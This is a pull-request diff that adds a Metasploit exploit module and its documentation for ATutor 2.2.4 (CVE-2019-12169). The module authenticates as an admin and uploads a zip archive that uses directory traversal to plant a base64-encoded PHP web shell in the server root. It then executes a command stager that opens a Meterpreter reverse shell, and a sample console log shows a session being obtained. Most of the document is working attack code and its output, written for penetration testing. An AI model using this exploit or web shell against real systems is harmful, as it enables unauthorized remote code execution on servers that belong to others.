### PR TITLE
Add ATutor 2.2.4 directory traversal / RCE module and docs

### DIFF
--- a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md
+++ b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md
@@ -18,11 +18,12 @@ attempts to remove the malicious PHP file from the present working directory.
 
 The module is compatible with both Windows and Linux targets. Users can specify a target OS, or use the `Auto` target option.
 In the latter case, the module will try to detect the target OS based on the `Server` header set by the target
-in it's response to an HTTP request. If detection is not possible in this manner, the module will assume the target is Windows x64,
-which seems to be the most likely target based on the ATutor documentation.
+in its response to an HTTP request.
 
 The module requires valid credentials for an ATutor account with admin privileges.
 It has been successfully tested against ATutor 2.2.4 running on a Windows 10 machine that used XAMPP.
+Vulnerable software can be downloaded here: https://sourceforge.net/projects/atutor/files/latest/download.
+ATutor is no longer being maintained and version 2.2.4 was the last release.
 
 ## Verification Steps
 1. Install the module as usual

--- a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md
+++ b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md
@@ -1,0 +1,134 @@
+## Vulnerable Application
+This module exploits an arbitrary file upload vulnerability together with a directory traversal
+flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in order to execute arbitrary commands.
+
+This module first authenticates to ATutor, using a randomly generated token to get around the front end JavaScript verification
+being used by the server. Next, the module generates a zip file containing a malicious PHP file.
+The zip archive takes advantage of a directory traversal vulnerability that will cause the target to drop the PHP file
+in the root server directory (`htdocs` for Windows and `html` for Linux targets) when unpacking the archive.
+For Windows targets, the module assumes that the target server uses XAMPP.
+However, users can override this default by setting a custom file traversal path.
+The PHP file contains an encoded payload that allows for remote command execution on the target server.
+The zip archive can be uploaded via two vectors, the `Import New Language` function and the `Patcher` function.
+The module first uploads the archive via `Import New Language` and then attempts to execute the payload
+via an HTTP GET request to the PHP file in the root server directory.
+If no session is obtained, the module creates another zip archive, uploads it via the `Patcher` function
+and then attempts to execute the payload the same way as before. If a session is obtained, the module automatically
+attempts to remove the malicious PHP file from the present working directory.
+
+The module is compatible with both Windows and Linux targets. Users can specify a target OS, or use the `Auto` target option.
+In the latter case, the module will try to detect the target OS based on the `Server` header set by the target
+in it's response to an HTTP request. If detection is not possible in this manner, the module will assume the target is Windows x64,
+which seems to be the most likely target based on the ATutor documentation.
+
+The module requires valid credentials for an ATutor account with admin privileges.
+It has been successfully tested against ATutor 2.2.4 running on a Windows 10 machine that used XAMPP.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/atutor_upload_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the ATutor account]`
+6. Do: `set PASSWORD [password for the ATutor account]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Targets
+
+```
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Auto
+   1   Linux
+   2   Windows
+
+```
+
+
+## Options
+### FILE_TRAVERSAL_PATH
+This is the traversal path to get from the upload path to the root server directory.
+It is used to make sure the malicious PHP is dropped in the root server directory when the zip being uploaded to the target
+is unpacked on the server side. The default value for Windows targets is `..\\..\\..\\..\\..\\../xampp\\htdocs\\`.
+This assumes the target uses XAMPP, as recommended in the ATutor documentation.
+The default value for Linux targets is `../../../../../../var/www/html/`.
+
+### PASSWORD
+The password for the ATutor account to authenticate with. This option is required.
+
+### TARGETURI
+The base path to ATutor. The default value is `/ATutor/`.
+
+### USERNAME
+The username for the ATutor account to authenticate with. This option is required.
+
+### WfsDelay
+The number of seconds to wait for a session to be created. This advanced option is used by the module to verify
+if exploitation via the `Import New Language` function succeeded. The default value is 3.
+
+## Scenarios
+### ATutor 2.2.4 running on Windows 10 (XAMPP)
+```
+msf5 exploit(multi/http/atutor_upload_traversal) > show options
+                                                                                                                  
+Module options (exploit/multi/http/atutor_upload_traversal):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   FILE_TRAVERSAL_PATH                   no        Traversal path to the root server directory. Default for Windows targets: `..\..\..\..\..\../xampp\htdocs\`. Linux Default: `../../../../../../var/www/html/.`
+   PASSWORD             root             yes       Password to authenticate with
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS               192.168.1.12     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                80               yes       The target port (TCP)
+   SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT              8080             yes       The local port to listen on.
+   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI            /ATutor/         yes       The base path to ATutor
+   URIPATH                               no        The URI to use for this exploit (default is random)
+   USERNAME             root             yes       Username to authenticate with
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.28     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(multi/http/atutor_upload_traversal) > run
+
+[*] Started reverse TCP handler on 192.168.1.28:4444 
+[+] Successfully authenticated as user 'root'. We have admin privileges!
+[+] Identified the target OS as Win64.
+[*] Setting payload to windows/x64/meterpreter/reverse_tcp.
+[*] Attempting exploitation via the `Import New Language` function.
+[*] Uploaded malicious PHP file vanwqiz.php.
+[*] Executing payload via /vanwqiz.php/qnwgdu?=<payload>...
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (201283 bytes) to 192.168.1.12
+[*] Meterpreter session 1 opened (192.168.1.28:4444 -> 192.168.1.12:49512) at 2020-06-12 13:50:47 -0400
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+[!] Deleting malicious PHP file vanwqiz.php
+
+meterpreter >
+
+```

--- a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md
+++ b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md
@@ -127,7 +127,7 @@ msf5 exploit(multi/http/atutor_upload_traversal) > run
 [*] Sending stage (201283 bytes) to 192.168.1.12
 [*] Meterpreter session 1 opened (192.168.1.28:4444 -> 192.168.1.12:49512) at 2020-06-12 13:50:47 -0400
 [*] Command Stager progress - 100.00% done (12025/12025 bytes)
-[!] Deleting malicious PHP file vanwqiz.php
+[+] Deleted vanwqiz.php
 
 meterpreter >
 

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'The base path to ATutor', '/ATutor/']),
       OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
       OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),
-      OptString.new('FILE_TRAVERSAL_PATH', [false, 'Traversal path to the root server directory. Default for Windows targets: `..\\..\\..\\..\\..\\../xampp\\htdocs\\`. Linux Default: `../../../../../../var/www/html/`.', false])
+      OptString.new('FILE_TRAVERSAL_PATH', [false, 'Traversal path to the root server directory. Default for Windows targets: `..\\..\\..\\..\\..\\../xampp\\htdocs\\`. Linux Default: `../../../../../../var/www/html/`.', ''])
     ]
     register_advanced_options [
       OptBool.new('ForceExploit', [false, 'Override check result', false])
@@ -197,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected('Unable to obtain ATutor version. However, the project is no longer maintained, so the target is likely vulnerable.')
     end
 
-    @version = Gem::Version.new @version
+    @version = Gem::Version.new(@version)
 
     # in case the developers ever release a patch or a new version
     unless @version <= Gem::Version.new('2.4')
@@ -242,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # encoding is necessary to evade blacklisting on server side
     @pl_encoded = Rex::Text.encode_base64("\r\n\t\r\n<?php echo passthru($_GET['#{@pl_command}']); ?>\r\n")
 
-    if datastore['FILE_TRAVERSAL_PATH']
+    if datastore['FILE_TRAVERSAL_PATH'] && !datastore['FILE_TRAVERSAL_PATH'].empty?
       @traversal_path = datastore['FILE_TRAVERSAL_PATH']
     elsif @my_target['Platform'] == 'linux'
       @traversal_path = '../../../../../../var/www/html/'

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -47,6 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit/'] # PoC
           ],
         'Platform' => %w[linux win],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Targets' =>
         [
           [ 'Auto', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ],
@@ -54,8 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux', {
               'Arch' => [ARCH_X86, ARCH_X64],
               'Platform' => 'linux',
+              'CmdStagerFlavor' => :bourne,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
               }
             }
           ],
@@ -63,8 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
             'Windows', {
               'Arch' => [ARCH_X86, ARCH_X64],
               'Platform' => 'win',
+              'CmdStagerFlavor' => :vbs,
               'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
               }
             }
           ]
@@ -82,8 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options [
       OptString.new('TARGETURI', [true, 'The base path to ATutor', '/ATutor/']),
-      OptString.new('USERNAME', [true, 'Username to authenticate with', false]),
-      OptString.new('PASSWORD', [true, 'Password to authenticate with', false]),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),
       OptString.new('FILE_TRAVERSAL_PATH', [false, 'Traversal path to the root server directory. Default for Windows targets: `..\\..\\..\\..\\..\\../xampp\\htdocs\\`. Linux Default: `../../../../../../var/www/html/`.', false])
     ]
     register_advanced_options [
@@ -101,22 +104,17 @@ class MetasploitModule < Msf::Exploit::Remote
     # By default, the Apache server header reveals the target OS using one of the strings used as keys in the hash below
     # Apache probably supports more OS keys, which can be added to the array
     target_os = res.headers['Server'].split('(')[1].split(')')[0]
-    target_identfiers = {
-      'CentOS' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
-      'Debian' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
-      'Fedora' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
-      'Ubuntu' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
-      'Unix' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
-      'Win32' => ['windows/x64/meterpreter/reverse_tcp', 'vbs'],
-      'Win64' => ['windows/x64/meterpreter/reverse_tcp', 'vbs']
-    }
 
-    unless target_os && target_identfiers.include?(target_os)
-      print_warning('Could not detect target OS.')
-      return
+    fail_with(Failure::NoTarget, 'Unable to determine target OS') unless target_os
+
+    case target_os
+    when 'CentOS', 'Debian', 'Fedora', 'Ubuntu', 'Unix'
+      @my_target = targets[1]
+    when 'Win32', 'Win64'
+      @my_target = targets[2]
+    else
+      fail_with(Failure::NoTarget, 'No valid target for target OS')
     end
-    @autoselect_pl = target_identfiers[target_os][0]
-    @autoselect_cmdstager = target_identfiers[target_os][1]
 
     print_good("Identified the target OS as #{target_os}.")
   end
@@ -244,29 +242,22 @@ class MetasploitModule < Msf::Exploit::Remote
     # encoding is necessary to evade blacklisting on server side
     @pl_encoded = Rex::Text.encode_base64("\r\n\t\r\n<?php echo passthru($_GET['#{@pl_command}']); ?>\r\n")
 
-    # The ATutor documentation recommends Windows users to use a XAMPP server.
-    win_file = "..\\..\\..\\..\\..\\../xampp\\htdocs\\#{@pl_file}"
-    lin_file = "../../../../../../var/www/html/#{@pl_file}"
-
-    # check for custom traversal path
-    if datastore['FILE_TRAVERSAL_PATH'] && datastore['FILE_TRAVERSAL_PATH'].to_s.strip != ''
-      target_platform = 'custom'
-    # check payload to determine which file to add to the zip file
-    elsif target.name == 'Auto'
-      target_platform = datastore['PAYLOAD'].split('/')[0]
+    if datastore['FILE_TRAVERSAL_PATH']
+      @traversal_path = datastore['FILE_TRAVERSAL_PATH']
+    elsif @my_target['Platform'] == 'linux'
+      @traversal_path = '../../../../../../var/www/html/'
+      datastore['CMDSTAGER::FLAVOR'] = 'bourne'
     else
-      target_platform = target.name.downcase
+      # The ATutor documentation recommends Windows users to use a XAMPP server.
+      @traversal_path = '..\\..\\..\\..\\..\\../xampp\\htdocs\\'
+      datastore['CMDSTAGER::FLAVOR'] = 'vbs'
     end
 
-    file_hash = {
-      'linux' => lin_file,
-      'windows' => win_file,
-      'custom' => "#{datastore['FILE_TRAVERSAL_PATH']}#{@pl_file}"
-    }
+    @traversal_path = "#{@traversal_path}#{@pl_file}"
 
     # create zip file
     zip_file = Rex::Zip::Archive.new
-    zip_file.add_file(file_hash[target_platform], "<?php eval(\"?>\".base64_decode(\"#{@pl_encoded}\")); ?>")
+    zip_file.add_file(@traversal_path, "<?php eval(\"?>\".base64_decode(\"#{@pl_encoded}\")); ?>")
     zip_name = Rex::Text.rand_text_alpha_lower(5..8)
     zip_name << '.zip'
 
@@ -342,12 +333,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # used to check if a session has been created (session_created? never returns true for some reason)
     @got_session = nil
 
-    # if automatic targeting was selected and succeeded, set the payload and cmdstager accordingly
-    # the cmdstager needs to be set as well in this case becaues metasploit doesn't know how to select it otherwise
-    if target.name == 'Auto' && @autoselect_pl
-      print_status("Setting payload to #{@autoselect_pl}.")
-      datastore['PAYLOAD'] = @autoselect_pl
-      datastore['CMDSTAGER::FLAVOR'] = @autoselect_cmdstager
+    # if automatic targeting was selected and succeeded, set the target accordingly
+    unless target.name == 'Auto'
+      @my_target = target
     end
 
     # There are two vulnerable functions, the `Import New Language` function and the `Patcher` function

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -237,6 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def create_zip_and_upload(exploit)
     @pl_file = Rex::Text.rand_text_alpha_lower(6..10)
     @pl_file << '.php'
+    register_file_for_cleanup(@pl_file)
     @header = Rex::Text.rand_text_alpha_upper(4)
     @pl_command = Rex::Text.rand_text_alpha_lower(6..10)
     # encoding is necessary to evade blacklisting on server side
@@ -319,11 +321,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_new_session(client)
     super client
     @got_session = true
-    if @pl_file
-      print_warning("Deleting malicious PHP file #{@pl_file}")
-      execute_command("rm #{@pl_file}")
-    end
-
   end
 
   def execute_command(cmd, _opts = {})

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -1,0 +1,378 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ATutor 2.2.4 - Directory Traversal / Remote Code Execution, ',
+        'Description' => %q{
+          This module exploits an arbitrary file upload vulnerability together with
+          a directory traversal flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in
+          order to execute arbitrary commands.
+
+          It first creates a zip archive containing a malicious PHP file. The zip
+          archive takes advantage of a directory traversal vulnerability that will
+          cause the PHP file to be dropped in the root server directory (`htdocs`
+          for Windows and `html` for Linux targets). The PHP file contains an
+          encoded payload that allows for remote command execution on the
+          target server. The zip archive can be uploaded via two vectors, the
+          `Import New Language` function and the `Patcher` function. The module
+          first uploads the archive via `Import New Language` and then attempts to
+          execute the payload via an HTTP GET request to the PHP file  in the root
+          server directory. If no session is obtained, the module creates another
+          zip archive and attempts exploitation via `Patcher`.
+
+          Valid credentials for an ATutor admin account are required. This module
+          has been successfully tested against ATutor 2.2.4 running on Windows 10
+          (XAMPP server).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'liquidsky (JMcPeters)', # PoC
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2019-12169'],
+            ['URL', 'https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit/'] # PoC
+          ],
+        'Platform' => %w[linux win],
+        'Targets' =>
+        [
+          [ 'Auto', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ],
+          [
+            'Linux', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2019-05-17',
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'WfsDelay' => 3 # If exploitation via `Import New Language` doesn't work, wait this long before attempting exploiting via `Patcher`
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to ATutor', '/ATutor/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', false]),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', false]),
+      OptString.new('FILE_TRAVERSAL_PATH', [false, 'Traversal path to the root server directory. Default for Windows targets: `..\\..\\..\\..\\..\\../xampp\\htdocs\\`. Linux Default: `../../../../../../var/www/html/`.', false])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
+  end
+
+  def select_target(res)
+    unless res.headers.include? 'Server'
+      print_warning('Could not detect target OS.')
+      return
+    end
+
+    # The ATutor documentation recommends installing it on a XAMPP server.
+    # By default, the Apache server header reveals the target OS using one of the strings used as keys in the hash below
+    # Apache probably supports more OS keys, which can be added to the array
+    target_os = res.headers['Server'].split('(')[1].split(')')[0]
+    target_identfiers = {
+      'CentOS' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
+      'Debian' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
+      'Fedora' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
+      'Ubuntu' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
+      'Unix' => ['linux/x86/meterpreter/reverse_tcp', 'bourne'],
+      'Win32' => ['windows/x64/meterpreter/reverse_tcp', 'vbs'],
+      'Win64' => ['windows/x64/meterpreter/reverse_tcp', 'vbs']
+    }
+
+    unless target_os && target_identfiers.include?(target_os)
+      print_warning('Could not detect target OS.')
+      return
+    end
+    @autoselect_pl = target_identfiers[target_os][0]
+    @autoselect_cmdstager = target_identfiers[target_os][1]
+
+    print_good("Identified the target OS as #{target_os}.")
+  end
+
+  def check
+    vprint_status('Running check')
+
+    # visit login page to get cookies
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'login.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 302 && res.body.include?('content="ATutor')
+      return CheckCode::Safe('Target is not an ATutor application.')
+    end
+
+    cookie = res.get_cookies
+
+    # generate login hash, which requires taking advantage of the 'token' parameter
+    hashed_pass = Rex::Text.sha1(datastore['PASSWORD'])
+    @token = Rex::Text.rand_text_alpha_lower(5..8)
+    hashed_pass << @token
+    hash_final = Rex::Text.sha1(hashed_pass)
+
+    # use generated hash to perform login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login.php'),
+      'cookie' => cookie,
+      'vars_post' => {
+        'form_password_hidden' => hash_final,
+        'form_login' => datastore['USERNAME'],
+        'token' => @token,
+        'submit' => 'Login'
+      }
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    # check if we are being redirected to the admin page
+    unless res.code == 302 && res.headers.to_s.include?('admin/index.php')
+      return CheckCode::Unknown('Failed to authenticate as a user with admin privileges.')
+    end
+
+    @cookie = res.get_cookies
+    redirect = URI(res.headers['Location'])
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, redirect),
+      'cookie' => @cookie
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless (res.code == 200 || res.code == 302) && res.body.include?('<title>Home: Administration</title>')
+      return CheckCode::Unknown('Failed to authenticate as a user with admin privileges.')
+    end
+
+    print_good("Successfully authenticated as user '#{datastore['USERNAME']}'. We have admin privileges!")
+
+    if target.name == 'Auto'
+      select_target(res)
+    end
+
+    html = res.get_html_document
+    info = html.search('dd')
+    info.each do |dd|
+      if dd.text.to_s.include?('Version')
+        @version = dd.text.split(' ')[0].strip.chomp('.')
+      end
+    end
+
+    unless @version && !@version.to_s.empty?
+      return CheckCode::Detected('Unable to obtain ATutor version. However, the project is no longer maintained, so the target is likely vulnerable.')
+    end
+
+    @version = Gem::Version.new @version
+
+    # in case the developers ever release a patch or a new version
+    unless @version <= Gem::Version.new('2.4')
+      return CheckCode::Unknown("Target is ATutor with version #{@version}.")
+    end
+
+    CheckCode::Appears("Target is ATutor with version #{@version}.")
+  end
+
+  def patcher_csrf_token(upload_url)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => upload_url,
+      'cookie' => @cookie
+    })
+
+    unless res && (res.code == 200 || res.code == 302)
+      fail_with(Failure::NoAccess, 'Failed to obtain csrf token.')
+    end
+
+    html = res.get_html_document
+    csrf_token = html.at('input[@name="csrftoken"]')['value']
+    max_file_size = html.at('input[@name="MAX_FILE_SIZE"]')['value']
+
+    unless csrf_token && csrf_token.to_s.strip != ''
+      csrf_token = @token # these should be the same because if the token generated by the module during authentication is accepted by the app, it becomes the csrf token
+    end
+
+    unless max_file_size && max_file_size.to_s.strip != ''
+      max_file_size = '52428800' # this seems to be the default value
+    end
+
+    return csrf_token, max_file_size
+  end
+
+  def create_zip_and_upload(exploit)
+    @pl_file = Rex::Text.rand_text_alpha_lower(6..10)
+    @pl_file << '.php'
+    @header = Rex::Text.rand_text_alpha_upper(4)
+    @pl_command = Rex::Text.rand_text_alpha_lower(6..10)
+    # encoding is necessary to evade blacklisting on server side
+    @pl_encoded = Rex::Text.encode_base64("\r\n\t\r\n<?php echo passthru($_GET['#{@pl_command}']); ?>\r\n")
+
+    # The ATutor documentation recommends Windows users to use a XAMPP server.
+    win_file = "..\\..\\..\\..\\..\\../xampp\\htdocs\\#{@pl_file}"
+    lin_file = "../../../../../../var/www/html/#{@pl_file}"
+
+    # check for custom traversal path
+    if datastore['FILE_TRAVERSAL_PATH'] && datastore['FILE_TRAVERSAL_PATH'].to_s.strip != ''
+      target_platform = 'custom'
+    # check payload to determine which file to add to the zip file
+    elsif target.name == 'Auto'
+      target_platform = datastore['PAYLOAD'].split('/')[0]
+    else
+      target_platform = target.name.downcase
+    end
+
+    file_hash = {
+      'linux' => lin_file,
+      'windows' => win_file,
+      'custom' => "#{datastore['FILE_TRAVERSAL_PATH']}#{@pl_file}"
+    }
+
+    # create zip file
+    zip_file = Rex::Zip::Archive.new
+    zip_file.add_file(file_hash[target_platform], "<?php eval(\"?>\".base64_decode(\"#{@pl_encoded}\")); ?>")
+    zip_name = Rex::Text.rand_text_alpha_lower(5..8)
+    zip_name << '.zip'
+
+    post_data = Rex::MIME::Message.new
+
+    # select exploit method
+    if exploit == 'language'
+      print_status('Attempting exploitation via the `Import New Language` function.')
+      upload_url = normalize_uri(target_uri.path, 'mods', '_core', 'languages', 'language_import.php')
+
+      post_data.add_part(zip_file.pack, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{zip_name}\"")
+      post_data.add_part('Import', nil, nil, 'form-data; name="submit"')
+    elsif exploit == 'patcher'
+      print_status('Attempting exploitation via the `Patcher` function.')
+      upload_url = normalize_uri(target_uri.path, 'mods', '_standard', 'patcher', 'index_admin.php')
+
+      patch_info = patcher_csrf_token(upload_url)
+      csrf_token = patch_info[0]
+      max_file_size = patch_info[1]
+
+      post_data.add_part(csrf_token, nil, nil, 'form-data; name="csrftoken"')
+      post_data.add_part(max_file_size, nil, nil, 'form-data; name="MAX_FILE_SIZE"')
+      post_data.add_part(zip_file.pack, 'application/zip', nil, "form-data; name=\"patchfile\"; filename=\"#{zip_name}\"")
+      post_data.add_part('Install', nil, nil, 'form-data; name="install_upload"')
+      post_data.add_part('1', nil, nil, 'form-data; name="uploading"')
+    else
+      fail_with(Failure::Unknown, 'An error occurred.')
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => upload_url,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => @cookie,
+      'headers' => {
+        'Accept-Encoding' => 'gzip,deflate',
+        'Referer' => "http://#{datastore['RHOSTS']}#{upload_url}"
+      },
+      'data' => post_data.to_s
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to upload the payload.')
+    end
+
+    unless (res.code == 200 || res.code == 302)
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
+    end
+    print_status("Uploaded malicious PHP file #{@pl_file}.")
+  end
+
+  def on_new_session(client)
+    super client
+    @got_session = true
+    if @pl_file
+      print_warning("Deleting malicious PHP file #{@pl_file}")
+      execute_command("rm #{@pl_file}")
+    end
+
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(@pl_file),
+      'cookie' => @cookie,
+      'vars_get' => { @pl_command => cmd }
+    })
+
+    unless res && (res.code == 200 || res.code == 302)
+      fail_with(Failure::PayloadFailed, 'Failed to execute the payload')
+    end
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # used to check if a session has been created (session_created? never returns true for some reason)
+    @got_session = nil
+
+    # if automatic targeting was selected and succeeded, set the payload and cmdstager accordingly
+    # the cmdstager needs to be set as well in this case becaues metasploit doesn't know how to select it otherwise
+    if target.name == 'Auto' && @autoselect_pl
+      print_status("Setting payload to #{@autoselect_pl}.")
+      datastore['PAYLOAD'] = @autoselect_pl
+      datastore['CMDSTAGER::FLAVOR'] = @autoselect_cmdstager
+    end
+
+    # There are two vulnerable functions, the `Import New Language` function and the `Patcher` function
+    # The module first attempts to exploit `Import New Language`. If that fails, it tries to exploit `Patcher`
+
+    # create_zip_and_upload('patcher')
+    create_zip_and_upload('language')
+    print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")
+    execute_cmdstager(background: true)
+
+    # The only way to know whether or not the exploit succeeded, is by checking if a session was created
+    sleep(wfs_delay)
+    unless @got_session
+      print_warning('Failed to obtain a session when exploiting `Import New Language`.')
+      create_zip_and_upload('patcher')
+      print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")
+      execute_cmdstager(background: true)
+    end
+  end
+end

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -318,11 +318,6 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Uploaded malicious PHP file #{@pl_file}.")
   end
 
-  def on_new_session(client)
-    super client
-    @got_session = true
-  end
-
   def execute_command(cmd, _opts = {})
     res = send_request_cgi({
       'method' => 'GET',
@@ -360,10 +355,10 @@ class MetasploitModule < Msf::Exploit::Remote
     create_zip_and_upload('language')
     print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")
     execute_cmdstager(background: true)
+    sleep(wfs_delay)
 
     # The only way to know whether or not the exploit succeeded, is by checking if a session was created
-    sleep(wfs_delay)
-    unless @got_session
+    unless session_created?
       print_warning('Failed to obtain a session when exploiting `Import New Language`.')
       create_zip_and_upload('patcher')
       print_status("Executing payload via #{normalize_uri(@pl_file)}/#{@pl_command}?=<payload>...")

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Targets' =>
         [
-          [ 'Auto', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ],
+          [ 'Auto', { } ],
           [
             'Linux', {
               'Arch' => [ARCH_X86, ARCH_X64],

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
